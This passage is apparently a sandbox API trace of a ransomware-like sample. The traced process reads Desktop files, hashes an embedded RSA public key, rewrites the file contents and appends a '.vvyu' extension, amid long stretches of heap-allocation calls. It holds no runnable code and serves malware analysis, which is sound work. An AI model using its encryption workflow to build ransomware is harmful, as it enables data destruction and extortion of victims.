HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c934f8 | out: hHeap=0x620000) returned 1 [0192.128] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93570 | out: hHeap=0x620000) returned 1 [0192.128] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93a80 | out: hHeap=0x620000) returned 1 [0192.128] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0192.129] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0192.129] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93450 | out: hHeap=0x620000) returned 1 [0192.129] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e94cc0 | out: hHeap=0x620000) returned 1 [0192.129] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9d830 | out: hHeap=0x620000) returned 1 [0192.130] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0192.130] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccadf0 | out: hHeap=0x620000) returned 1 [0192.130] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0192.130] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0192.130] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0192.130] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0192.130] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0192.131] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0192.131] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0192.131] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0192.131] WriteFile (in: hFile=0x568, lpBuffer=0x2e96a68*, nNumberOfBytesToWrite=0x6db7, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2e96a68*, lpNumberOfBytesWritten=0x312fb14*=0x6db7, lpOverlapped=0x0) returned 1 [0192.132] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a68 | out: hHeap=0x620000) returned 1 [0192.132] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x6dbc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.132] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0192.133] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0192.133] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0192.133] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2e96a68 [0192.133] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2e96a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0192.133] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2e96e98 [0192.134] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a68 | out: hHeap=0x620000) returned 1 [0192.134] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0192.134] WriteFile (in: hFile=0x568, lpBuffer=0x2e96e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e96e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0192.134] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96e98 | out: hHeap=0x620000) returned 1 [0192.135] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0192.135] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0192.135] CloseHandle (hObject=0x568) returned 1 [0192.137] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0192.137] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x870) returned 0x2e96a68 [0192.137] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0192.137] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\823XfKbFCBWP.m4a" (normalized: "c:\\users\\keecfmwgj\\desktop\\823xfkbfcbwp.m4a"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\823XfKbFCBWP.m4a.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\823xfkbfcbwp.m4a.vvyu")) returned 1 [0192.139] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a68 | out: hHeap=0x620000) returned 1 [0192.140] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0192.140] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.142] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4658 | out: hHeap=0x620000) returned 1 [0192.142] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0bef730, ftCreationTime.dwHighDateTime=0x1d89902, ftLastAccessTime.dwLowDateTime=0x697e4280, ftLastAccessTime.dwHighDateTime=0x1d8a454, ftLastWriteTime.dwLowDateTime=0x697e4280, ftLastWriteTime.dwHighDateTime=0x1d8a454, nFileSizeHigh=0x0, nFileSizeLow=0xd9ae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Bk2Yjoq3Rz.bmp", cAlternateFileName="BK2YJO~1.BMP")) returned 1 [0192.143] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e94cc0 [0192.143] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4658 [0192.143] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e94cc0 | out: hHeap=0x620000) returned 1 [0192.143] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\Bk2Yjoq3Rz.bmp") returned=".bmp" [0192.143] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\Bk2Yjoq3Rz.bmp" (normalized: "c:\\users\\keecfmwgj\\desktop\\bk2yjoq3rz.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0192.143] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=55726) returned 1 [0192.143] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0192.146] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0xd988, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.146] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0192.149] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0192.149] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0192.149] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0192.149] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0xd9ae, lpOverlapped=0x0) returned 1 [0192.151] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.151] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0192.151] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.151] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.151] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0192.152] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0192.152] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0192.152] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0192.152] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0192.152] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0192.152] GetLastError () returned 0x0 [0192.152] SetLastError (dwErrCode=0x0) [0192.152] GetLastError () returned 0x0 [0192.152] SetLastError (dwErrCode=0x0) [0192.152] GetLastError () returned 0x0 [0192.152] SetLastError (dwErrCode=0x0) [0192.152] GetLastError () returned 0x0 [0192.153] SetLastError (dwErrCode=0x0) [0192.153] GetLastError () returned 0x0 [0192.153] SetLastError (dwErrCode=0x0) [0192.153] GetLastError () returned 0x0 [0192.153] SetLastError (dwErrCode=0x0) [0192.153] GetLastError () returned 0x0 [0192.153] SetLastError (dwErrCode=0x0) [0192.153] GetLastError () returned 0x0 [0192.153] SetLastError (dwErrCode=0x0) [0192.153] GetLastError () returned 0x0 [0192.153] SetLastError (dwErrCode=0x0) [0192.153] GetLastError () returned 0x0 [0192.153] SetLastError (dwErrCode=0x0) [0192.153] GetLastError () returned 0x0 [0192.153] SetLastError (dwErrCode=0x0) [0192.153] GetLastError () returned 0x0 [0192.153] SetLastError (dwErrCode=0x0) [0192.153] GetLastError () returned 0x0 [0192.153] SetLastError (dwErrCode=0x0) [0192.153] GetLastError () returned 0x0 [0192.153] SetLastError (dwErrCode=0x0) [0192.153] GetLastError () returned 0x0 [0192.153] SetLastError (dwErrCode=0x0) [0192.153] GetLastError () returned 0x0 [0192.154] SetLastError (dwErrCode=0x0) [0192.154] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0192.154] GetLastError () returned 0x0 [0192.154] SetLastError (dwErrCode=0x0) [0192.154] GetLastError () returned 0x0 [0192.154] SetLastError (dwErrCode=0x0) [0192.154] GetLastError () returned 0x0 [0192.154] SetLastError (dwErrCode=0x0) [0192.154] GetLastError () returned 0x0 [0192.154] SetLastError (dwErrCode=0x0) [0192.154] GetLastError () returned 0x0 [0192.154] SetLastError (dwErrCode=0x0) [0192.154] GetLastError () returned 0x0 [0192.154] SetLastError (dwErrCode=0x0) [0192.154] GetLastError () returned 0x0 [0192.154] SetLastError (dwErrCode=0x0) [0192.154] GetLastError () returned 0x0 [0192.154] SetLastError (dwErrCode=0x0) [0192.154] GetLastError () returned 0x0 [0192.154] SetLastError (dwErrCode=0x0) [0192.154] GetLastError () returned 0x0 [0192.154] SetLastError (dwErrCode=0x0) [0192.154] GetLastError () returned 0x0 [0192.154] SetLastError (dwErrCode=0x0) [0192.154] GetLastError () returned 0x0 [0192.155] SetLastError (dwErrCode=0x0) [0192.155] GetLastError () returned 0x0 [0192.155] SetLastError (dwErrCode=0x0) [0192.155] GetLastError () returned 0x0 [0192.155] SetLastError (dwErrCode=0x0) [0192.155] GetLastError () returned 0x0 [0192.155] SetLastError (dwErrCode=0x0) [0192.155] GetLastError () returned 0x0 [0192.155] SetLastError (dwErrCode=0x0) [0192.155] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0192.155] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0192.156] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0192.156] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0192.156] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0192.156] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0192.156] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0192.156] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0192.156] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0192.156] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0192.157] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0192.157] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0192.157] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xd9b0) returned 0x2e96a68 [0192.157] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0192.158] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0192.158] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0192.158] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0192.158] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0192.158] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0192.158] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e94cc0 [0192.158] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93450 [0192.158] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e94c78 [0192.158] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93570 [0192.158] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c934f8 [0192.158] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93558 [0192.158] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93510 [0192.158] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0192.158] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x655b18 [0192.158] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x655b18, Size=0x218) returned 0x2ea4420 [0192.159] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea4640 [0192.159] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c934f8 | out: hHeap=0x620000) returned 1 [0192.159] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93510 | out: hHeap=0x620000) returned 1 [0192.159] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93558 | out: hHeap=0x620000) returned 1 [0192.159] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0192.159] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea4640 | out: hHeap=0x620000) returned 1 [0192.159] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93558 [0192.160] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a40 [0192.160] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93510 [0192.160] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0192.160] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2c934f8 [0192.160] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0192.160] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2e914a8 [0192.160] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0192.160] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0192.160] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0192.160] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c998c8 [0192.160] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0192.160] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0192.160] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0192.161] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93510 | out: hHeap=0x620000) returned 1 [0192.161] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0192.161] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c934f8 | out: hHeap=0x620000) returned 1 [0192.161] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0192.161] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0192.161] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93558 | out: hHeap=0x620000) returned 1 [0192.161] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0192.161] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0192.161] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea4420 | out: hHeap=0x620000) returned 1 [0192.161] GetCurrentThreadId () returned 0x66c [0192.161] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0192.162] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x64e020 [0192.162] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0192.162] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0192.162] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e93a80 [0192.162] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0192.162] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0192.162] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0192.162] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.162] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.162] GetCurrentThreadId () returned 0x66c [0192.162] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.163] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.163] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0192.163] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.163] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.163] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.163] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.164] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0192.164] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0192.164] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0192.164] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccadf0 [0192.164] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0192.164] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0192.164] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0192.164] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93558 [0192.164] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0192.164] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0192.164] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0192.164] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0192.164] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0192.164] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0192.164] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0192.165] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0192.165] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c934f8 [0192.165] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0192.165] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0192.165] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0192.165] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0192.165] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0192.165] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0192.165] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0192.165] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93510 [0192.165] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0192.165] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0192.165] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0192.165] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c934c8 [0192.165] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0192.165] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c935b8 [0192.165] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0192.165] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ae0 [0192.165] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0192.165] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93540 [0192.165] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0192.165] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93528 [0192.166] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0192.166] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c935d0 [0192.166] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93528 | out: hHeap=0x620000) returned 1 [0192.166] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93528 